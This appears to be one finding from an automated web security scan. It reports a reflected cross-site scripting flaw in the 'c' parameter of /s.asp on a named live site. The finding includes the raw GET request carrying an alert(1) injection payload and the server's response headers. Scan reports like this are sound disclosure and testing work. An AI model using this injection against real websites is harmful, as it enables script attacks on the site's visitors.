1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.pollmonkey.com |
Path: | /s.asp |
GET /s.asp?c=5389959443dd6"%3balert(1)/ Host: www.pollmonkey.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:43:28 GMT X-Powered-By: ASP.NET pragma: No-cache cache-control: private Content-Length: 366 Content-Type: application/x-javascript Expires: Mon, 30 Nov 2009 21:43:28 GMT Set-Cookie: ASPSESSIONIDQQTDSCCB Cache-control: no-cache Connection: close X-Powered-By: Bananas and Rum X-Monkey-Sign: Screaming Monkeys document.write("<script src=\"http://www document.write("<script src=\"http://www.p ...[SNIP]... |